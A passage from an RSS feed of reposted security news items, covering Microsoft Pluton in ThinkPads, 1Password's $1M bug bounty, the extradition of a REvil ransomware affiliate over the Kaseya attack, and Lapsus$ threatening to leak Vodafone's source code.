		The absence of Pluton in ThinkPads, a staple laptop among businesses, would be a big hit, but Pluton will get its opportunity in the new ThinkPad Z-series and some ThinkPad T-series laptops that will begin releasing in May. The laptops use <a href="https://arstechnica.com/gadgets/2022/01/amd-launches-ryzen-6000-laptop-apus-with-updated-rdna2-graphics/" rel="external nofollow">AMD Ryzen 6000 mobile</a> CPUs, which integrate Pluton. The <a href="https://arstechnica.com/gadgets/2022/02/lenovo-announces-the-first-arm-based-thinkpad/" rel="external nofollow">ThinkPad X13s</a>, which uses a Snapdragon 8cx Gen 3 and arrives in June, will also use Pluton.
	</p>

	<p>
		 
	</p>

	<p>
		However, Pluton features, such as storing Windows Hello credentials, will be off by default in ThinkPads, Lenovo told <a href="https://www.theregister.com/2022/01/20/microsoft_amd_pluton_lenovo/" rel="external nofollow">The Register</a> in January.
	</p>

	<p>
		 
	</p>
</div>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/gadgets/2022/03/dell-says-microsofts-pluton-security-chip-isnt-right-for-its-business-pcs/" rel="external nofollow">Microsoft Pluton doesn’t “align” with Dell’s hardware security strategy</a>
</p>
]]></description><guid isPermaLink="false">4676</guid><pubDate>Fri, 11 Mar 2022 20:36:51 +0000</pubDate></item><item><title>1Password ups maximum bug bounty to a cool $1,000,000</title><link>https://nsaneforums.com/news/security-privacy-news/1password-ups-maximum-bug-bounty-to-a-cool-1000000-r4674/</link><description><![CDATA[<h3>
	Popular password manager now has the largest bug bounty program on Bugcrowd
</h3>

<p>
	<a data-component-tracked="1" href="https://www.techradar.com/reviews/1password" rel="external nofollow" target="_blank">1Password</a> has announced that it has increased its top bug bounty reward for finding potential security flaws in its password manager to $1m.
</p>

<p>
	 
</p>

<p>
	Not only is this the highest bounty in the history of the IT security company Bugcrowd, but it's also one of the largest rewards in the industry.
</p>

<p>
	 
</p>

<p>
	1Password CEO Jeff Shiner explained in a <a data-component-tracked="1" data-url="https://www.prnewswire.com/news-releases/1password-raises-bug-bounty-to-industry-leading-1-million-301500045.html?tc=eml_cleartime" href="https://www.prnewswire.com/news-releases/1password-raises-bug-bounty-to-industry-leading-1-million-301500045.html?tc=eml_cleartime" rel="external nofollow" target="_blank">press release</a> how the move will attract additional security experts and white hat hackers while also strengthening the security of its password manager, saying:
</p>

<p>
	 
</p>

<p>
	"No one should have to choose between safety and convenience, and we're making this major investment to demonstrate our commitment to keeping 1Password customers secure. Increasing our bug bounty to $1 million will attract another layer of outside expertise to make sure our systems are as secure as possible. Together, we will deepen our security leadership so our customers can live their lives online with ease and confidence."
</p>

<h2 id="strengthening-its-platform">
	Strengthening its platform
</h2>

<p>
	1Password regularly engages both external security experts and white hat hackers as part of its normal day-to-day operations in an effort to discover any blind spots in its platform. By expanding its bug bounty program, though, the company will be able to enlist thousands of researchers to continue these efforts.
</p>

<p>
	 
</p>

<p>
	Since starting its bug bounty program back in 2017, 1Password has paid out $103k to Bugcrowd researchers with an average bounty of $900. Although all of the bugs detected so far have been minor and didn't put any sensitive customer data at risk, the company was able to resolve them quickly which also helped reduce the risk of attacks.
</p>

<p>
	 
</p>

<p>
	Besides its bug bounty program, 1Password conducts over a dozen external penetration tests annually and releases the results to the public. The company also runs a Security Ambassador Program to train and develop security expertise in its development teams, as well as an Eyes of the Month program that rewards employees who report the most impactful security issue of the month.
</p>

<p>
	 
</p>

<p>
	Security researchers and others interested in getting started with the 1Password bug bounty program can visit the company's site or its <a data-component-tracked="1" data-url="https://bugcrowd.com/agilebits" href="https://bugcrowd.com/agilebits" rel="external nofollow" target="_blank">Bugcrowd page</a>.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.techradar.com/news/1password-ups-maximum-bug-bounty-to-a-cool-dollar1000000" rel="external nofollow">1Password ups maximum bug bounty to a cool $1,000,000</a>
</p>
]]></description><guid isPermaLink="false">4674</guid><pubDate>Fri, 11 Mar 2022 08:22:52 +0000</pubDate></item><item><title>REvil ransomware member extradited to U.S. to stand trial for Kaseya attack</title><link>https://nsaneforums.com/news/security-privacy-news/revil-ransomware-member-extradited-to-us-to-stand-trial-for-kaseya-attack-r4664/</link><description><![CDATA[<p>
	The U.S. Department of Justice announced that alleged REvil ransomware affiliate, Yaroslav Vasinskyi, was extradited to the United States last week to stand trial for the Kaseya cyberattack.
</p>

<p>
	 
</p>

<p>
	Vasinskyi, a 22-year-old Ukrainian national, was <a href="https://www.bleepingcomputer.com/news/security/us-seizes-6-million-from-revil-ransomware-arrest-kaseya-hacker/" target="_blank" rel="external nofollow">arrested in November 2021</a> while entering Poland for his cybercrime activities as a REvil member.
</p>

<p>
	 
</p>

<p>
	Vasinskyi is believed to be a REvil ransomware affiliate tasked with breaching corporate networks worldwide, stealing unencrypted data, and then encrypting all of the devices on the network.
</p>

<p>
	 
</p>

<p>
	Shortly after Vasinskyi was arrested, the DOJ announced that he was responsible for the <a href="https://www.bleepingcomputer.com/news/security/kaseya-roughly-1-500-businesses-hit-by-revil-ransomware-attack/" target="_blank" rel="external nofollow">ransomware attack against Kaseya</a>, a managed services provider, which impacted thousands of companies worldwide.
</p>

<p>
	 
</p>

<p>
	“In the alleged attack against Kaseya, Vasinskyi caused the deployment of malicious Sodinokibi/REvil code throughout a Kaseya product that caused the Kaseya production functionality to deploy REvil ransomware to “endpoints” on Kaseya customer networks,” explained the <a href="https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas" rel="external nofollow" target="_blank">U.S. DoJ announcement</a>.
</p>

<p>
	 
</p>

<p>
	“After the remote access to Kaseya endpoints was established, the ransomware was executed on those computers, which resulted in the encryption of data on computers of organizations around the world that used Kaseya software.”
</p>

<p>
	 
</p>

<p>
	The REvil operation (aka Sodinokibi) <a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-asks-70-million-to-decrypt-all-kaseya-attack-victims/" target="_blank" rel="external nofollow">demanded $70 million for a decryption key</a> to decrypt all of Kaseya’s affected customers. However, the <a href="https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/" target="_blank" rel="external nofollow">FBI received the decryption key</a> after a law enforcement operation gained access to the ransomware operation’s servers.
</p>

<p>
	 
</p>

<p>
	Vasinskyi is believed to be one of REvil’s long-term affiliates, taking part in at least nine confirmed ransomware attacks against companies in the U.S.
</p>

<p>
	 
</p>

<p>
	The <a href="https://www.documentcloud.org/documents/21100006-yaroslav-vasinskyi-indictment?responsive=1&amp;title=1" rel="external nofollow" target="_blank">indictment</a> that was unsealed following his arrest substantiates eleven counts, linking them to distinct attacks against North American firms.
</p>

<p>
	 
</p>

<p>
	The charges that Vasinskyi is facing now for his actions are the following:
</p>

<p>
	 
</p>

<ul>
	<li>
		Conspiracy to commit fraud and related activity in connection with computers
	</li>
	<li>
		Intentional damage to protected computers
	</li>
	<li>
		Conspiracy to commit money laundering
	</li>
</ul>

<p>
	 
</p>

<p>
	If convicted on all counts, Vasinskyi could be sentenced to a total of 115 years in prison. He would also forfeit all property and financial assets.
</p>

<h2>
	MSPs targeted by ransomware in the past
</h2>

<p>
	Managed Service Providers use specialized software to remotely manage their customers’ networks, including pushing out patches, performing remote support, and managing the Windows domain.
</p>

<p>
	 
</p>

<p>
	Since the launch of the GandCrab ransomware operation and its successor, REvil, an affiliate has consistently shown expertise in MSP platforms by using them to encrypt targeted MSPs’ customers.
</p>

<p>
	 
</p>

<p>
	This expertise has led to <a href="https://www.bleepingcomputer.com/news/security/ransomware-attacks-target-msps-to-mass-infect-customers/" target="_blank" rel="external nofollow">successful attacks against managed service providers</a> using the specialized software they use, including the Kaseya, ConnectWise, and <a href="https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/" target="_blank" rel="external nofollow">WebRoot</a> MSP platforms.
</p>

<p>
	 
</p>

<p>
	The Kaseya attack used previously unknown zero-day vulnerabilities and intimate knowledge of how the systems work, possibly indicating that this same affiliate was behind this attack as well.
</p>

<p>
	 
</p>

<p>
	If Vasinskyi is this affiliate, his arrest and potential imprisonment are a boon to the MSP industry, which now has one less threat actor to worry about.
</p>

<h2>
	REvil in limbo
</h2>

<p>
	The case of Vasinskyi is a success for the U.S. judiciary and law enforcement, especially considering that Ukraine currently has no extradition treaty with the United States.
</p>

<p>
	 
</p>

<p>
	However, he is only one of the numerous REvil affiliates and almost certainly not part of <a href="https://www.bleepingcomputer.com/news/security/us-offers-10-million-reward-for-leaders-of-revil-ransomware/" target="_blank" rel="external nofollow">the core team</a> of the notorious RaaS (ransomware as a service) gang.
</p>

<p>
	 
</p>

<p>
	On November 4, 2021, two suspected REvil affiliates <a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-affiliates-arrested-in-romania-and-kuwait/" target="_blank" rel="external nofollow">were arrested</a> in Romania and Kuwait in an international law enforcement action coordinated by Europol and Interpol.
</p>

<p>
	 
</p>

<p>
	On January 15, 2022, the Federal Security Service (FSB) <a href="https://www.bleepingcomputer.com/news/security/russia-arrests-revil-ransomware-gang-members-seize-66-million/" target="_blank" rel="external nofollow">announced the arrest</a> of fourteen suspected members of REvil, yet the leading operators are still <a href="https://blog.reversinglabs.com/blog/after-russian-arrests-revil-rolls-on" rel="external nofollow" target="_blank">assumed</a> to be free.
</p>

<p>
	 
</p>

<p>
	While the <a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/" target="_blank" rel="external nofollow">REvil ransomware operation is shut down</a>, it would not be surprising to see its core members or affiliates rebrand as a new operation in the future.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-member-extradited-to-us-to-stand-trial-for-kaseya-attack/" rel="external nofollow">REvil ransomware member extradited to U.S. to stand trial for Kaseya attack</a>
</p>
]]></description><guid isPermaLink="false">4664</guid><pubDate>Thu, 10 Mar 2022 19:08:58 +0000</pubDate></item><item><title>Lapsus$ hackers threatening to release Vodafone's proprietary code</title><link>https://nsaneforums.com/news/security-privacy-news/lapsus-hackers-threatening-to-release-vodafones-proprietary-code-r4663/</link><description><![CDATA[<p>
	The hacker group Lapsus$ has posted on its Telegram account in the last few days asking people to vote on which company should get their data leaked next; it’s offering Vodafone’s source code, Impresa’s source code and databases, and MercadoLibre and MercadoPago source code. It has set the deadline for the poll’s closure for March 13. CNBC <a href="https://www.cnbc.com/2022/03/10/vodafone-investigating-hackers-claims-threatening-to-leak-source-code.html" rel="external nofollow">said that</a> Vodafone knew what was going on and is investigating how the hackers got the data.
</p>

<p>
	 
</p>

<p>
	At the time of writing, the poll had received 12,700 votes and CNBC says that Vodafone was leading with 56%. For obvious reasons, we’re not going to link to the poll but if you do manage to find it then it’s probably not a good idea to interact with it given that Vodafone could get law enforcement involved as a result.
</p>

<p>
	 
</p>

<p>
	<img alt="1646933519_lapsuss.jpg" class="ipsImage" data-ratio="65.58" height="282" width="430" src="https://cdn.neow.in/news/images/uploaded/2022/03/1646933519_lapsuss.jpg">
</p>

<p>
	 
</p>

<p>
	Speaking to CNBC, Vodafone said:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	“We are investigating the claim together with law enforcement, and at this point we cannot comment on the credibility of the claim. However, what we can say is that generally the types of repositories referenced in the claim contain proprietary source code and do not contain customer data.”
</p>

<p>
	 
</p>

<p>
	The threat to dump Vodafone’s confidential code comes just days after <a href="https://www.theregister.com/2022/03/07/samsung_lapsus_data_theft/" rel="external nofollow">the group released 190 GB of Samsung’s code online</a>. It has also been targeting NVIDIA.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/lapsus-hackers-threatening-to-release-vodafone039s-proprietary-code/" rel="external nofollow">Lapsus$ hackers threatening to release Vodafone's proprietary code</a>
</p>
]]></description><guid isPermaLink="false">4663</guid><pubDate>Thu, 10 Mar 2022 19:06:49 +0000</pubDate></item></channel></rss>
